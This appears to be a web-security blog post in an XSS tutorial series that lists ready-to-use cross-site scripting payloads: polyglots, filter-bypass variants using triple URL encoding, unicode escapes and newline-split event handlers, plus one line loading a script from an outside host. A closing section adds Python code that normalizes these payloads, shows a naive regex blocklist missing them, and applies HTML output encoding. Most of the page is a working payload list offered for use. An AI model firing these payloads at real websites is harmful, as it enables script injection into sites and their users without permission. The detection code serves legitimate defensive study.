1. Cross Site Scripting (XSS) : Getting Started
2. Bypassing XSS Filters : Part 1
3. Bypassing XSS Filters : Part 2
Quick XSS Payloads
You can use these payloads when you want to quickly check for XSS in a webpage.
Filter Check
It checks which characters are being filtered. It also checks whether the tag is blocked or not.
/"'`\:;
XSS Tester: Alert XSS Statement
This payload will try to close tags and bypass basic filters to execute an alert box.
';">'>alert(String.fromCharCode(88,83,83))
XSS Polyglot 1
This is my custom payload; it tries to bypass basic filters by closing open tags and combining several kinds of payloads.
';'>"><marquee>test</marquee><plaintext/onmouseover=prompt(test)> <img src="https://teamultimate.in/wp-content/uploads/2017/03/slide-main.png"> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
XSS Polyglot 2
//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--
XSS Polyglot 3
<svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d %0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg>
List Of Payloads
Without quotes and semicolons
Use when quotes and semicolons are being filtered.
<IMG SRC=javascript:alert('XSS')>
Without any quotes
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Defeats tag checking
<alert("test");//
Without closing tag
https://xss.rocks/xss.js?alert(1)
When script tag is being filtered
</script>alert(1)
Triple URL Encoding
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
JS-F**CK Payload
<img/src="x"/onerror="[boom]">
Using the onwheel event with the body tag
<body style="height:1000px" onwheel="[DATA]">
Using (&NewLine;) and (&NewTab;) with the <a> tag
<a href="j[785 bytes of newline and tab characters]avascript:alert(1);">XSS</a>
Using OnDrag with Unicode Encoding
--><d/ /ondrag=co\u006efir\u006d(2)>hello.
Spaces and meta chars before the JavaScript in images for XSS
<IMG SRC="  javascript:alert('XSS');">
Here are some other payloads:
"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript:co\u006efir\u006d("1")>clickme</a>
">co\u006efir\u006d`1`
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="<img src=x:x onerror=alert(1)>">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
The list ends here, but I will add more payloads later.
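The encoding tricks in this list (triple URL encoding, co\u006efir\u006d, %0A around an event handler) all target filters that inspect the raw input. The added example below is mine, not part of this page: it canonicalizes a few of the payloads above before matching, shows a typical keyword blocklist missing every one of them, and applies contextual HTML output encoding, which neutralizes them with no blocklist at all. The sample set and both regexes are my own constructions.

```python
import html
import re
from urllib.parse import unquote

# Constructed test set: four payloads taken from the list above plus one benign string.
SAMPLES = {
    "ondrag_unicode": r"--><d/ /ondrag=co\u006efir\u006d(2)>hello.",
    "triple_url": r"<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>",
    "ontoggle_unicode": r'"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome',
    "newline_handler": r'"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme',
    "benign": "Meeting at 10: bring your ID",
}

# A typical keyword filter run on the raw input: script tags, javascript: URIs,
# a handful of well-known handler names and the usual dialog functions.
NAIVE = re.compile(r"<script|javascript:|\bon(error|load|mouseover|click)\s*=|confirm\(|prompt\(", re.I)

def naive_blocklist(s: str) -> bool:
    return NAIVE.search(s) is not None

def normalize(s: str, max_rounds: int = 5) -> str:
    """Canonicalize before inspection: peel nested %XX encoding (the triple-encoded
    payload needs three rounds) and resolve JavaScript \\uXXXX escapes."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)

# Generic pattern applied to the canonical form: any on*= handler, with whitespace
# (including the decoded %0A newline) allowed around '=', or a javascript: scheme.
GENERIC = re.compile(r"\bon\w+\s*=|javascript\s*:", re.I)

def normalized_detect(s: str) -> bool:
    return GENERIC.search(normalize(s)) is not None

def encode_for_html_text(s: str) -> str:
    """The mitigation itself: contextual output encoding for an HTML text/attribute
    context, applied regardless of what any filter decided."""
    return html.escape(s, quote=True)

def classify(samples=SAMPLES) -> dict:
    """Per sample: (caught by naive blocklist?, caught after normalization?)."""
    return {name: (naive_blocklist(p), normalized_detect(p)) for name, p in samples.items()}

if __name__ == "__main__":
    for name, (naive, norm) in classify().items():
        print(f"{name:18} naive_blocklist={naive!s:5} normalized_detect={norm}")
```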
Thanks for reading.